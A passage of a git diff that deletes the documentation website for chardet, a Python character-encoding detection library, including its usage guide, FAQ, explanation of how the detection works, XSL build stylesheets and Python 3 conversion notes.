    • -EUC-JP, SHIFT_JIS, and ISO-2022-JP (Japanese)
    • -
    • -EUC-KR and ISO-2022-KR (Korean)
    • -
    • -KOI8-R, MacCyrillic, IBM855, IBM866, ISO-8859-5, and windows-1251 (Russian)
    • -
    • -ISO-8859-2 and windows-1250 (Hungarian)
    • -
    • -ISO-8859-5 and windows-1251 (Bulgarian)
    • -
    • windows-1252
    • -
    • -ISO-8859-7 and windows-1253 (Greek)
    • -
    • -ISO-8859-8 and windows-1255 (Visual and Logical Hebrew)
    • -
    • -TIS-620 (Thai)
    • -
    • -UTF-32 BE, LE, 3412-ordered, or 2143-ordered (with a BOM)
    • -
    • -UTF-16 BE or LE (with a BOM)
    • -
    • -UTF-8 (with or without a BOM)
    • -
    • ASCII
    • -
    - - - -
    Caution
    Due to inherent similarities between certain encodings, some encodings may be detected incorrectly. In my tests, the most problematic case was Hungarian text encoded as ISO-8859-2 or windows-1250 (encoded as one but reported as the other). Also, Greek text encoded as ISO-8859-7 was often mis-reported as ISO-8859-2. Your mileage may vary.
    -
    -
    -
    - -
    -Usageֲ ג†’
    -
    -
    - - - diff --git a/chardet/docs/usage.html b/chardet/docs/usage.html deleted file mode 100644 index 194532b..0000000 --- a/chardet/docs/usage.html +++ /dev/null @@ -1,94 +0,0 @@ - - - - -Usage [Universal Encoding Detector] - - - - - - - - - - -
    - -
    -
    -

    - Usage

    -
    -
    -
    -
    -

    - Basic usage

    -
    -
    -

    The easiest way to use the Universal Encoding Detector library is with the detect function.

    -
    -

    Example:ֲ Using the detect function

    -

    The detect function takes one argument, a non-Unicode string. It returns a dictionary containing the auto-detected character encoding and a confidence level from 0 to 1.

    -
    >>> import urllib
    ->>> rawdata = urllib.urlopen('http://yahoo.co.jp/').read()
    ->>> import chardet
    ->>> chardet.detect(rawdata)
    -{'encoding': 'EUC-JP', 'confidence': 0.99}
    -
    -
    -
    -
    -

    - Advanced usage

    -
    -
    -

    If you're dealing with a large amount of text, you can call the Universal Encoding Detector library incrementally, and it will stop as soon as it is confident enough to report its results.

    -

    Create a UniversalDetector object, then call its feed method repeatedly with each block of text. If the detector reaches a minimum threshold of confidence, it will set detector.done to True.

    -

    Once you've exhausted the source text, call detector.close(), which will do some final calculations in case the detector didn't hit its minimum confidence threshold earlier. Then detector.result will be a dictionary containing the auto-detected character encoding and confidence level (the same as the chardet.detect function returns).

    -
    -

    Example:ֲ Detecting encoding incrementally

    -
    import urllib
    -from chardet.universaldetector import UniversalDetector
    -
    -usock = urllib.urlopen('http://yahoo.co.jp/')
    -detector = UniversalDetector()
    -for line in usock.readlines():
    -    detector.feed(line)
    -    if detector.done: break
    -detector.close()
    -usock.close()
    -print detector.result
    -
    {'encoding': 'EUC-JP', 'confidence': 0.99}
    -
    -

    If you want to detect the encoding of multiple texts (such as separate files), you can re-use a single UniversalDetector object. Just call detector.reset() at the start of each file, call detector.feed as many times as you like, and then call detector.close() and check the detector.result dictionary for the file's results.

    -
    -

    Example:ֲ Detecting encodings of multiple files

    -
    import glob
    -from charset.universaldetector import UniversalDetector
    -
    -detector = UniversalDetector()
    -for filename in glob.glob('*.xml'):
    -    print filename.ljust(60),
    -    detector.reset()
    -    for line in file(filename, 'rb'):
    -        detector.feed(line)
    -        if detector.done: break
    -    detector.close()
    -    print detector.result
    -
    -
    -
    -
    -
    -
    - -
    -How it worksֲ ג†’
    -
    -
    - - - diff --git a/chardet/docs/xml/chardet.xml b/chardet/docs/xml/chardet.xml deleted file mode 100644 index d3a3380..0000000 --- a/chardet/docs/xml/chardet.xml +++ /dev/null @@ -1,295 +0,0 @@ - - -%entities_version; - -Universal Encoding Detector"> - -chardet"> - - -A composite approach to language/encoding detection"> ->>> "> -... "> -BOM"> -BE"> -LE"> -detect"> -0"> -1"> -UniversalDetector"> -EscCharSetProber"> -MBCSGroupProber"> -MultiByteCharSetProber"> -SJISProber"> -SJISContextAnalysis"> -EUCJPContextAnalysis"> -JapaneseContextAnalysis"> -SBCSGroupProber"> -SingleByteCharSetProber"> -HebrewProber"> -Latin1Prober"> -big5freq.py"> -langcyrillicmodel.py"> -universaldetector.py"> -escprober.py"> -escsm.py"> -mbcsgroupprober.py"> -mbcharsetprober.py"> -chardistribution.py"> -sjisprober.py"> -jpcntx.py"> -sbcsgroupprober.py"> -sbcharsetprober.py"> -hebrewprober.py"> -latin1prober.py"> -ASCII"> -]> - -
    - -&title; - -&title; - - -Mark -Pilgrim - - - -2006 -2007 -2008 -Mark Pilgrim - -&fileversion; - - -<para>This documentation claims to describe the behavior of &chardet; &chardet_version;. It does not claim to describe the behavior of any other version.</para> -<para>This documentation lives at <ulink url="&url_book;"/>. If you're reading it somewhere else, you may not have the latest version.</para> -</abstract> -<keywordset> -<keyword>character</keyword> -<keyword>set</keyword> -<keyword>encoding</keyword> -<keyword>detection</keyword> -<keyword>Python</keyword> -<keyword>XML</keyword> -<keyword>feed</keyword> -</keywordset> -<legalnotice> -<para>This documentation is provided by the author <quote>as is</quote> without any express or implied warranties. See <xref linkend="license"/> for more details.</para> -</legalnotice> -</articleinfo> - -<section id="faq"> -<title>Frequently asked questions - -
    -What is character encoding? -When you think of text, you probably think of characters and symbols I see on my computer screen. But computers don't deal in characters and symbols; they deal in bits and bytes. Every piece of text you've ever seen on a computer screen is actually stored in a particular character encoding. There are many different character encodings, some optimized for particular languages like Russian or Chinese or English, and others that can be used for multiple languages. Very roughly speaking, the character encoding provides a mapping between the stuff you see on your screen and the stuff your computer actually stores in memory and on disk. -In reality, it's more complicated than that. Many characters are common to multiple encodings, but each encoding may use a different sequence of bytes to actually store those characters in memory or on disk. So you can think of the character encoding as a kind of decryption key for the text. Whenever someone gives you a sequence of bytes and claims it's text, you need to know what character encoding they used so you can decode the bytes into characters and display them (or process them, or whatever). -
    -
    -What is character encoding auto-detection? -It means taking a sequence of bytes in an unknown character encoding, and attempting to determine the encoding so you can read the text. It's like cracking a code when you don't have the decryption key. -
    -
    -Isn't that impossible? -In general, yes. However, some encodings are optimized for specific languages, and languages are not random. Some character sequences pop up all the time, while other sequences make no sense. A person fluent in English who opens a newspaper and finds txzqJv 2!dasd0a QqdKjvz will instantly recognize that that isn't English (even though it is composed entirely of English letters). By studying lots of typical text, a computer algorithm can simulate this kind of fluency and make an educated guess about a text's language. -In other words, encoding detection is really language detection, combined with knowledge of which languages tend to use which character encodings. -
    -
    -Who wrote this detection algorithm? -This library is a port of the auto-detection code in Mozilla. I have attempted to maintain as much of the original structure as possible (mostly for selfish reasons, to make it easier to maintain the port as the original code evolves). I have also retained the original authors' comments, which are quite extensive and informative. -You may also be interested in the research paper which led to the Mozilla implementation, &researchpaper;. -
    -
    -Yippie! Screw the standards, I'll just auto-detect everything! -Don't do that. Virtually every format and protocol contains a method for specifying character encoding. - -HTTP can define a charset parameter in the Content-type header. -HTML documents can define a <meta http-equiv="content-type"> element in the <head> of a web page. -XML documents can define an encoding attribute in the XML prolog. - -If text comes with explicit character encoding information, you should use it. If the text has no explicit information, but the relevant standard defines a default encoding, you should use that. (This is harder than it sounds, because standards can overlap. If you fetch an XML document over HTTP, you need to support both standards and figure out which one wins if they give you conflicting information.) -Despite the complexity, it's worthwhile to follow standards and respect explicit character encoding information. It will almost certainly be faster and more accurate than trying to auto-detect the encoding. It will also make the world a better place, since your program will interoperate with other programs that follow the same standards. -
    -
    -Why bother with auto-detection if it's slow, inaccurate, and non-standard? -Sometimes you receive text with verifiably inaccurate encoding information. Or text without any encoding information, and the specified default encoding doesn't work. There are also some poorly designed standards that have no way to specify encoding at all. -If following the relevant standards gets you nowhere, and you decide that processing the text is more important than maintaining interoperability, then you can try to auto-detect the character encoding as a last resort. An example is my Universal Feed Parser, which calls this auto-detection library only after exhausting all other options. -
    - - -
    - - - - -<para>&chardet; currently supports over two dozen character encodings.</para> -</abstract> -</sectioninfo> -<title>Supported encodings - -Big5, GB2312/GB18030, EUC-TW, HZ-GB-2312, and ISO-2022-CN (Traditional and Simplified Chinese) -EUC-JP, SHIFT_JIS, and ISO-2022-JP (Japanese) -EUC-KR and ISO-2022-KR (Korean) -KOI8-R, MacCyrillic, IBM855, IBM866, ISO-8859-5, and windows-1251 (Russian) -ISO-8859-2 and windows-1250 (Hungarian) -ISO-8859-5 and windows-1251 (Bulgarian) -windows-1252 -ISO-8859-7 and windows-1253 (Greek) -ISO-8859-8 and windows-1255 (Visual and Logical Hebrew) -TIS-620 (Thai) -UTF-32 &be;, ≤, 3412-ordered, or 2143-ordered (with a &bom;) -UTF-16 &be; or ≤ (with a &bom;) -UTF-8 (with or without a &bom;) -&ascii; - - - -<para>Due to inherent similarities between certain encodings, some encodings may be detected incorrectly. In my tests, the most problematic case was Hungarian text encoded as <literal>ISO-8859-2</literal> or <literal>windows-1250</literal> (encoded as one but reported as the other). Also, Greek text encoded as <literal>ISO-8859-7</literal> was often mis-reported as <literal>ISO-8859-2</literal>. Your mileage may vary.</para> -</caution> -</section> - -<section id="usage"> -<?dbhtml filename="usage.html"?> -<title>Usage -
    -Basic usage -The easiest way to use the &chardet; library is with the &detect; function. - -Using the &detect; function -The &detect; function takes one argument, a non-Unicode string. It returns a dictionary containing the auto-detected character encoding and a confidence level from &zero; to &one;. -&prompt;import urllib -&prompt;rawdata = urllib.urlopen('http://yahoo.co.jp/').read() -&prompt;import chardet -&prompt;chardet.detect(rawdata) -{'encoding': 'EUC-JP', 'confidence': 0.99} - -
    -
    -Advanced usage -If you're dealing with a large amount of text, you can call the &chardet; library incrementally, and it will stop as soon as it is confident enough to report its results. -Create a &universaldetector_classname; object, then call its feed method repeatedly with each block of text. If the detector reaches a minimum threshold of confidence, it will set detector.done to True. -Once you've exhausted the source text, call detector.close(), which will do some final calculations in case the detector didn't hit its minimum confidence threshold earlier. Then detector.result will be a dictionary containing the auto-detected character encoding and confidence level (the same as the chardet.detect function returns). - -Detecting encoding incrementally - -{'encoding': 'EUC-JP', 'confidence': 0.99} - -If you want to detect the encoding of multiple texts (such as separate files), you can re-use a single &universaldetector_classname; object. Just call detector.reset() at the start of each file, call detector.feed as many times as you like, and then call detector.close() and check the detector.result dictionary for the file's results. - -Detecting encodings of multiple files - - -
    -
    - -
    - - - - -<para>This is a brief guide to navigating the code itself.</para> -</abstract> -</sectioninfo> -<title>How it works -First, you should read &researchpaper;, which explains the detection algorithm and how it was derived. This will help you later when you stumble across the huge character frequency distribution tables like &big5freq_py; and language models like &langcyrillicmodel_py;. -The main entry point for the detection algorithm is &universaldetector_py;, which has one class, &universaldetector_classname;. (You might think the main entry point is the &detect; function in chardet/__init__.py, but that's really just a convenience function that creates a &universaldetector_classname; object, calls it, and returns its result.) -There are 5 categories of encodings that &universaldetector_classname; handles: - -UTF-n with a &bom;. This includes UTF-8, both &be; and ≤ variants of UTF-16, and all 4 byte-order variants of UTF-32. -Escaped encodings, which are entirely 7-bit &ascii; compatible, where non-&ascii; characters start with an escape sequence. Examples: ISO-2022-JP (Japanese) and HZ-GB-2312 (Chinese). -Multi-byte encodings, where each character is represented by a variable number of bytes. Examples: Big5 (Chinese), SHIFT_JIS (Japanese), EUC-KR (Korean), and UTF-8 without a &bom;. -Single-byte encodings, where each character is represented by one byte. Examples: KOI8-R (Russian), windows-1255 (Hebrew), and TIS-620 (Thai). -windows-1252, which is used primarily on Microsoft Windows by middle managers who don't know a character encoding from a hole in the ground. - -
    -<literal>UTF-n</literal> with a &bom; -If the text starts with a &bom;, we can reasonably assume that the text is encoded in UTF-8, UTF-16, or UTF-32. (The &bom; will tell us exactly which one; that's what it's for.) This is handled inline in &universaldetector_classname;, which returns the result immediately without any further processing. -
    -
    -Escaped encodings -If the text contains a recognizable escape sequence that might indicate an escaped encoding, &universaldetector_classname; creates an &esccharsetprober_classname; (defined in &escprober_py;) and feeds it the text. -&esccharsetprober_classname; creates a series of state machines, based on models of HZ-GB-2312, ISO-2022-CN, ISO-2022-JP, and ISO-2022-KR (defined in &escsm_py;). &esccharsetprober_classname; feeds the text to each of these state machines, one byte at a time. If any state machine ends up uniquely identifying the encoding, &esccharsetprober_classname; immediately returns the positive result to &universaldetector_classname;, which returns it to the caller. If any state machine hits an illegal sequence, it is dropped and processing continues with the other state machines. -
    -
    -Multi-byte encodings -Assuming no &bom;, &universaldetector_classname; checks whether the text contains any high-bit characters. If so, it creates a series of probers for detecting multi-byte encodings, single-byte encodings, and as a last resort, windows-1252. -The multi-byte encoding prober, &mbcsgroupprober_classname; (defined in &mbcsgroupprober_py;), is really just a shell that manages a group of other probers, one for each multi-byte encoding: Big5, GB2312, EUC-TW, EUC-KR, EUC-JP, SHIFT_JIS, and UTF-8. &mbcsgroupprober_classname; feeds the text to each of these encoding-specific probers and checks the results. If a prober reports that it has found an illegal byte sequence, it is dropped from further processing (so that, for instance, any subsequent calls to &universaldetector_classname;.feed will skip that prober). If a prober reports that it is reasonably confident that it has detected the encoding, &mbcsgroupprober_classname; reports this positive result to &universaldetector_classname;, which reports the result to the caller. -Most of the multi-byte encoding probers are inherited from &multibytecharsetprober_classname; (defined in &mbcharsetprober_py;), and simply hook up the appropriate state machine and distribution analyzer and let &multibytecharsetprober_classname; do the rest of the work. &multibytecharsetprober_classname; runs the text through the encoding-specific state machine, one byte at a time, to look for byte sequences that would indicate a conclusive positive or negative result. At the same time, &multibytecharsetprober_classname; feeds the text to an encoding-specific distribution analyzer. -The distribution analyzers (each defined in &chardistribution_py;) use language-specific models of which characters are used most frequently. Once &multibytecharsetprober_classname; has fed enough text to the distribution analyzer, it calculates a confidence rating based on the number of frequently-used characters, the total number of characters, and a language-specific distribution ratio. If the confidence is high enough, &multibytecharsetprober_classname; returns the result to &mbcsgroupprober_classname;, which returns it to &universaldetector_classname;, which returns it to the caller. -The case of Japanese is more difficult. Single-character distribution analysis is not always sufficient to distinguish between EUC-JP and SHIFT_JIS, so the &sjisprober_classname; (defined in &sjisprober_py;) also uses 2-character distribution analysis. &sjiscontextanalysis_classname; and &eucjpcontextanalysis_classname; (both defined in &jpcntx_py; and both inheriting from a common &japanesecontextanalysis_classname; class) check the frequency of Hiragana syllabary characters within the text. Once enough text has been processed, they return a confidence level to &sjisprober_classname;, which checks both analyzers and returns the higher confidence level to &mbcsgroupprober_classname;. -
    -
    -Single-byte encodings -The single-byte encoding prober, &sbcsgroupprober_classname; (defined in &sbcsgroupprober_py;), is also just a shell that manages a group of other probers, one for each combination of single-byte encoding and language: windows-1251, KOI8-R, ISO-8859-5, MacCyrillic, IBM855, and IBM866 (Russian); ISO-8859-7 and windows-1253 (Greek); ISO-8859-5 and windows-1251 (Bulgarian); ISO-8859-2 and windows-1250 (Hungarian); TIS-620 (Thai); windows-1255 and ISO-8859-8 (Hebrew). -&sbcsgroupprober_classname; feeds the text to each of these encoding+language-specific probers and checks the results. These probers are all implemented as a single class, &singlebytecharsetprober_classname; (defined in &sbcharsetprober_py;), which takes a language model as an argument. The language model defines how frequently different 2-character sequences appear in typical text. &singlebytecharsetprober_classname; processes the text and tallies the most frequently used 2-character sequences. Once enough text has been processed, it calculates a confidence level based on the number of frequently-used sequences, the total number of characters, and a language-specific distribution ratio. -Hebrew is handled as a special case. If the text appears to be Hebrew based on 2-character distribution analysis, &hebrewprober_classname; (defined in &hebrewprober_py;) tries to distinguish between Visual Hebrew (where the source text actually stored backwards line-by-line, and then displayed verbatim so it can be read from right to left) and Logical Hebrew (where the source text is stored in reading order and then rendered right-to-left by the client). Because certain characters are encoded differently based on whether they appear in the middle of or at the end of a word, we can make a reasonable guess about direction of the source text, and return the appropriate encoding (windows-1255 for Logical Hebrew, or ISO-8859-8 for Visual Hebrew). -
    -
    -windows-1252 -If &universaldetector_classname; detects a high-bit character in the text, but none of the other multi-byte or single-byte encoding probers return a confident result, it creates a &latin1prober_classname; (defined in &latin1prober_py;) to try to detect English text in a windows-1252 encoding. This detection is inherently unreliable, because English letters are encoded in the same way in many different encodings. The only way to distinguish windows-1252 is through commonly used symbols like smart quotes, curly apostrophes, copyright symbols, and the like. &latin1prober_classname; automatically reduces its confidence rating to allow more accurate probers to win if at all possible. -
    -
    - -
    - - - - -<para>&chardet; is currently at version &chardet_version;.</para> -</abstract> -</sectioninfo> -<title>Revision history - - -1.0.1 (2008-03-05) - - -fixed typo in detecting little endian UTF-16; closes issue 81 -fixed length of ISO2022JPCharLenTable; closes issue 98 - - - - -1.0 (2006-01-10) - - -Initial release - - - - -
    - -&license; - -
    diff --git a/chardet/docs/xml/license.xml b/chardet/docs/xml/license.xml deleted file mode 100644 index e21adf9..0000000 --- a/chardet/docs/xml/license.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -Terms of use -Software -The &chardet; library is copyright © 2006-2008 Mark Pilgrim. All rights reserved. -Portions copyright © 1998-2001 Netscape Communications Corporation. All rights reserved. -The &chardet; library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. -This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. -You should have received a copy of the GNU Lesser General Public License along with this library (in a file named COPYING); if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - -Documentation -The &chardet; documentation is copyright © 2006-2008 Mark Pilgrim. All rights reserved. - -Redistribution and use in source (XML DocBook) and compiled forms (SGML, HTML, PDF, PostScript, RTF and so forth) with or without modification, are permitted provided that the following conditions are met: - - -Redistributions of source code (XML DocBook) must retain the above copyright notice, this list of conditions and the following disclaimer unmodified. -Redistributions in compiled form (transformed to other DTDs, converted to PDF, PostScript, RTF and other formats) must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. - - -THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AS IS AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - diff --git a/chardet/docs/xml/version.xml b/chardet/docs/xml/version.xml deleted file mode 100644 index f610749..0000000 --- a/chardet/docs/xml/version.xml +++ /dev/null @@ -1,2 +0,0 @@ - - diff --git a/chardet/docs/xsl/common.xsl b/chardet/docs/xsl/common.xsl deleted file mode 100644 index 9e2bcc6..0000000 --- a/chardet/docs/xsl/common.xsl +++ /dev/null @@ -1,253 +0,0 @@ - - - -mailto:mark@diveintomark.org -mark@diveintomark.org - - - - - - - -3 - - - - - -mailto:mark@diveintomark.org - - - - - - - - - - - - - - - - -
    - - - - - - - -
      - - - - - - -
    -
    -
    - - - - -ul - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - -
    -
    - - - - 24 - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - - ( - - ) - - - {$conum} - - - - - - - - - - - - - - - - - - - - : - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/xsl/html.xsl b/chardet/docs/xsl/html.xsl deleted file mode 100644 index 25f0099..0000000 --- a/chardet/docs/xsl/html.xsl +++ /dev/null @@ -1,400 +0,0 @@ - - - - - -../css/chardet.css - - - -images/ -images/callouts/ - - - - -appendix toc -article toc -book toc -chapter toc -part toc -preface toc -qandadiv toc -qandaset toc -reference toc -sect1 toc -sect2 toc -sect3 toc -sect4 toc -sect5 toc -section toc -set toc - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - -
    -
    - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #include virtual="/inc/header.html" - - - - - - -
    -
    - - ←  - - - - - - - - - -
    -
    - - - - - - - - - -  → - -
    -
    -
    - -
    - - - - - - - - - - - - - - furtherreading - reference-from - seealso - - - -
    - -
      - -
    -
    -
    - - -

    - -

    -
    - - - -

    - - - - - - copyright - - - - - - - - - - · - - - - - - - · - - - - - - - Terms of use - -

    -
    - - - -
    - -
    -
    - - - - - - - - - - -

    - - ( - - ) -

    - - - -
    - - - - - - - - - - - - - - - - - - - <!-- this is the only line that has changed --> - <xsl:copy-of select="$title"/><xsl:text> [Universal Encoding Detector]</xsl:text> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/xsl/htmlcommon.xsl b/chardet/docs/xsl/htmlcommon.xsl deleted file mode 100644 index d73c078..0000000 --- a/chardet/docs/xsl/htmlcommon.xsl +++ /dev/null @@ -1,167 +0,0 @@ - - - - - - - -chardet.css - -0 - - - - - - - - - - - - - - -

    - - - -

    -
    - - - - - -   - - -   - - - - -

    - -

    -
    - - -

    - -

    -
    - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - -
    -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -          
    -            
    -          
    -        
    -
    - -
    -          
    -        
    -
    -
    -
    - - - - - - - -
    - -
    -
    - - - -
    -
    - -
    diff --git a/chardet/docs/xsl/htmldist.xsl b/chardet/docs/xsl/htmldist.xsl deleted file mode 100644 index 9e89980..0000000 --- a/chardet/docs/xsl/htmldist.xsl +++ /dev/null @@ -1,78 +0,0 @@ - - - - - -css/chardet.css -dist/docs/ - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - -
    -
    - - -
    - - - - - -
    -
    -
    - - - -
    - -
    -
    -
    -
    - -
    - -
    diff --git a/chardet/docs/xsl/htmlsingle.xsl b/chardet/docs/xsl/htmlsingle.xsl deleted file mode 100644 index 06c2535..0000000 --- a/chardet/docs/xsl/htmlsingle.xsl +++ /dev/null @@ -1,29 +0,0 @@ - - - - - - - - - -appendix -article toc -book -chapter -part -preface -qandadiv -qandaset -reference -sect1 -sect2 -sect3 -sect4 -sect5 -section -set - - - diff --git a/chardet/docs/xsl/nonhtmlcommon.xsl b/chardet/docs/xsl/nonhtmlcommon.xsl deleted file mode 100644 index 71da75d..0000000 --- a/chardet/docs/xsl/nonhtmlcommon.xsl +++ /dev/null @@ -1,72 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - - -

    -
    - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/xsl/pdf.xsl b/chardet/docs/xsl/pdf.xsl deleted file mode 100644 index cfbe65d..0000000 --- a/chardet/docs/xsl/pdf.xsl +++ /dev/null @@ -1,84 +0,0 @@ - - - - - - - - - -appendix -article -book -chapter -part -preface -qandadiv -qandaset -reference -sect1 -sect2 -sect3 -sect4 -sect5 -section -set - - - - - - PAGE BREAK - - - - - - bullet - - - © - (tm) - (tm) - ® - (SM) -   - " - " - ' - ' - - - - - - - - - - - - - - ldquo - - - - - - rdquo - - - - diff --git a/chardet/docs/xsl/text.xsl b/chardet/docs/xsl/text.xsl deleted file mode 100644 index 93f1464..0000000 --- a/chardet/docs/xsl/text.xsl +++ /dev/null @@ -1,92 +0,0 @@ - - - - - - - - -appendix -article toc -book -chapter -part -preface -qandadiv -qandaset -reference -sect1 -sect2 -sect3 -sect4 -sect5 -section -set - - - - bullet - - - - - * - (c) - (tm) - (tm) - (r) - (SM) - - <<" - >>" - ' - ' - - - - - - - - - - * - - - - - - - ldquo - - - - - - rdquo - - - - - - - - - - - - - - - - - - - - - [ - - ] - - - - - - diff --git a/chardet/docs/xsl/word2000.xsl b/chardet/docs/xsl/word2000.xsl deleted file mode 100644 index caef49d..0000000 --- a/chardet/docs/xsl/word2000.xsl +++ /dev/null @@ -1,124 +0,0 @@ - - - - - - - -appendix -article -book -chapter -part -preface -qandadiv -qandaset -reference -sect1 -sect2 -sect3 -sect4 -sect5 -section -set - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [if gte mso 9]><xml> - <o:DocumentProperties> - <o:Author>Mark Pilgrim</o:Author> - </o:DocumentProperties> - <w:WordDocument> - <w:View>Print</w:View> - <w:Zoom>100</w:Zoom> - </w:WordDocument> - </xml><![endif] - - - - - - - - -
    -
    - - - -
    - -
    - -
    diff --git a/chardet/download/chardet-1.0.1.tgz b/chardet/download/chardet-1.0.1.tgz deleted file mode 100644 index 4fd0098..0000000 Binary files a/chardet/download/chardet-1.0.1.tgz and /dev/null differ diff --git a/chardet/download/chardet-1.0.tgz b/chardet/download/chardet-1.0.tgz deleted file mode 100644 index 39d58c3..0000000 Binary files a/chardet/download/chardet-1.0.tgz and /dev/null differ diff --git a/chardet/download/index.html b/chardet/download/index.html deleted file mode 100644 index a92454d..0000000 --- a/chardet/download/index.html +++ /dev/null @@ -1,34 +0,0 @@ - - - - -Download [Universal Encoding Detector] - - - - -
    -
    - - - -

    Download version 1.0.1, released 2008-03-05

    - - -
    -
    - -
    - - - - - diff --git a/chardet/img/shadow.gif b/chardet/img/shadow.gif deleted file mode 100644 index f1e6cb5..0000000 Binary files a/chardet/img/shadow.gif and /dev/null differ diff --git a/chardet/img/shadow2.gif b/chardet/img/shadow2.gif deleted file mode 100644 index a0b9ed4..0000000 Binary files a/chardet/img/shadow2.gif and /dev/null differ diff --git a/chardet/img/shadowAlpha.png b/chardet/img/shadowAlpha.png deleted file mode 100644 index a2561df..0000000 Binary files a/chardet/img/shadowAlpha.png and /dev/null differ diff --git a/chardet/inc/header.html b/chardet/inc/header.html deleted file mode 100644 index abd8edd..0000000 --- a/chardet/inc/header.html +++ /dev/null @@ -1,19 +0,0 @@ -
    -
    -
    - - - -
    - -
    -
    -
    -
    diff --git a/chardet/index.html b/chardet/index.html deleted file mode 100644 index 489446c..0000000 --- a/chardet/index.html +++ /dev/null @@ -1,52 +0,0 @@ - - - - -Universal Encoding Detector: character encoding auto-detection in Python - - - - -
    -
    - -

    Getting started

    -
    -
    >>> import urllib
    ->>> urlread = lambda url: urllib.urlopen(url).read()
    ->>> import chardet
    ->>> chardet.detect(urlread("http://google.cn/"))
    -{'encoding': 'GB2312', 'confidence': 0.99}
    -
    ->>> chardet.detect(urlread("http://yahoo.co.jp/"))
    -{'encoding': 'EUC-JP', 'confidence': 0.99}
    -
    ->>> chardet.detect(urlread("http://amazon.co.jp/"))
    -{'encoding': 'SHIFT_JIS', 'confidence': 1}
    -
    ->>> chardet.detect(urlread("http://pravda.ru/"))
    -{'encoding': 'windows-1251', 'confidence': 0.9355}
    -
    ->>> chardet.detect(urlread("http://auction.co.kr/"))
    -{'encoding': 'EUC-KR', 'confidence': 0.99}
    -
    ->>> chardet.detect(urlread("http://haaretz.co.il/"))
    -{'encoding': 'windows-1255', 'confidence': 0.99}
    -
    ->>> chardet.detect(urlread("http://www.nectec.or.th/tindex.html"))
    -{'encoding': 'TIS-620', 'confidence': 0.7675}
    -
    ->>> chardet.detect(urlread("http://feedparser.org/docs/"))
    -{'encoding': 'utf-8', 'confidence': 0.99}
    -
    -
    - -
    -
    - -
    - - - - - diff --git a/chardet/python3-conversion-notes.txt b/chardet/python3-conversion-notes.txt deleted file mode 100644 index 0e0346f..0000000 --- a/chardet/python3-conversion-notes.txt +++ /dev/null @@ -1,34 +0,0 @@ -* python 2to3.py -w test.py (the -w flag makes a backup then overwrites the original file) -* python 2to3.py -w chardet/ directory (passing a directory acts on all .py files in the directory) - -* global search-and-replace constants.False --> False, constants.True --> True (unnecessary, Python3 always defines a Boolean type) -* constants.py: remove code for defining True and False - -* universaldetector.py, charsetgroupprober.py, charsetprober.py, escprober.py, eucjpprober.py, mbcharsetprober.py, sbcharsetprober.py, sbcsgroupprober.py, sjisprober.py, utf8prober.py: manually fix import statements that 2to3 missed - old: - import constants, sys - new: - from . import constants - import sys - -* test.py: change file() to open() - -* universaldetector.py: change r'' strings to b'' byte arrays in self._highBitDetector, self._escDetector regular expressions -* charsetprober.py: change regular expression-based replace to use b'' byte arrays instead of strings - -* universaldetector.py: change self._mLastChar from a '' string to a b'' byte array -* mbcharsetprober.py: change self._mLastChar from a list of two 1-character strings to a list of two ints - -* universaldetector.py: getting a single element from a byte array yields an integer, not a byte, so change syntax to make sure self._mLastChar is always a byte - old: - self._mLastChar = aBuf[-1] - new: - self._mLastChar = aBuf[-1:] - -- sbcharsetprober.py, latin1prober.py: change ord(c) to c since it's already an int (iterating through a byte array) - -* jpcntx.py, chardistribution.py: change 1-character strings to ints and hex ints, since we're just comparing ints to ints anyway -* jpcntx.py, chardistribution.py: change ord(aBuf[0]) to aBuf[0] since it's already an int (iterating through a byte array) -X jpcntx.py, chardistribution.py (editorial): global search-and-replace "aStr" --> "aBuf" to make it clear that we're passing around a byte array - -- latin1prober.py: refactor reduce(operator.add, ...) to use a for loop instead diff --git a/chardet/test.py b/chardet/test.py deleted file mode 100644 index 5680f8d..0000000 --- a/chardet/test.py +++ /dev/null @@ -1,19 +0,0 @@ -from chardet.universaldetector import UniversalDetector -import sys, glob - -count = 0 -u = UniversalDetector() -for f in glob.glob(sys.argv[1]): - print(f.ljust(60), end=' ') - u.reset() - for line in open(f, 